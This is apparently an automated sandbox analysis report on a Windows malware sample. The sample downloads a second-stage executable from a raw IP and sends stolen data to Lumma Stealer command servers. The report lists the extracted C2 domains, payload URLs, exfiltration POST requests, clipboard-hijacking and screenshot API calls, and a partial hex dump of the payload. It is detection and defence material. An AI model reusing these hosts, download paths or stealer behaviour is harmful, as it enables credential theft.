        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_020CADF7

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.6:64754 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.6:49721 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.6:49713 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.6:49732 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49721 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.96.1:443
        Source: Malware configuration extractorURLs: noisycuttej.shop
        Source: Malware configuration extractorURLs: cloudewahsj.shop
        Source: Malware configuration extractorURLs: framekgirus.shop
        Source: Malware configuration extractorURLs: tirepublicerj.shop
        Source: Malware configuration extractorURLs: wholersorie.shop
        Source: Malware configuration extractorURLs: abruptyopsn.shop
        Source: Malware configuration extractorURLs: nearycrepso.shop
        Source: Malware configuration extractorURLs: rabidcowse.shop
        Source: global trafficTCP traffic: 192.168.2.6:54305 -> 1.1.1.1:53
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 05 Jan 2025 07:55:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 05 Jan 2025 07:45:02 GMTETag: "50a00-62af0b081a546"Accept-Ranges: bytesContent-Length: 330240Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b0 30 64 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1c 04 00 00 52 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 2c 5e 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 22 04 00 50 00 00 00 00 e0 04 00 60 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 1b 04 00 00 10 00 00 00 1c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c ac 00 00 00 30 04 00 00 60 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 c8 00 00 00 e0 04 00 00 8a 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
        Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 104.21.96.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49709 -> 104.21.56.70:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1J7F5XH1TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=98L01M5AUXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15052Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R6CJX3XOEB58LQLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19940Host: cloudewahsj.shop
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
        Source: IH5XqCdf06.exe, IH5XqCdf06.exe, 00000000.00000003.2159927093.0000000000762000.00000004.00000020.00020000.00000000.sdmp, IH5XqCdf06.exe, 00000000.00000002.4570218539.0000000000762000.00000004.00000020.00020000.00000000.sdmp, IH5XqCdf06.exe, 00000000.00000003.4437028090.0000000000762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: IH5XqCdf06.exe, 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeU
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeY
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: 5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/7
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/G
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/Y
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2208519350.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2237192063.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/api
        Source: 5734.tmp.exe, 00000003.00000003.2237192063.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apiR
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apiY
        Source: 5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apic
        Source: 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apie-
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: IH5XqCdf06.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: IH5XqCdf06.exe, 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: IH5XqCdf06.exe, 00000000.00000002.4569947875.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEw
        Source: 5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: 5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: 5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: 5734.tmp.exe, 00000003.00000003.2224712437.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
        Source: 5734.tmp.exe, 00000003.00000003.2224712437.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
        Source: 5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
        Source: 5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
        Source: 5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49732 version: TLS 1.2
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00641942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_00641942
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00437C10

        System Summary

        barindex
        Source: 00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00642361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_00642361
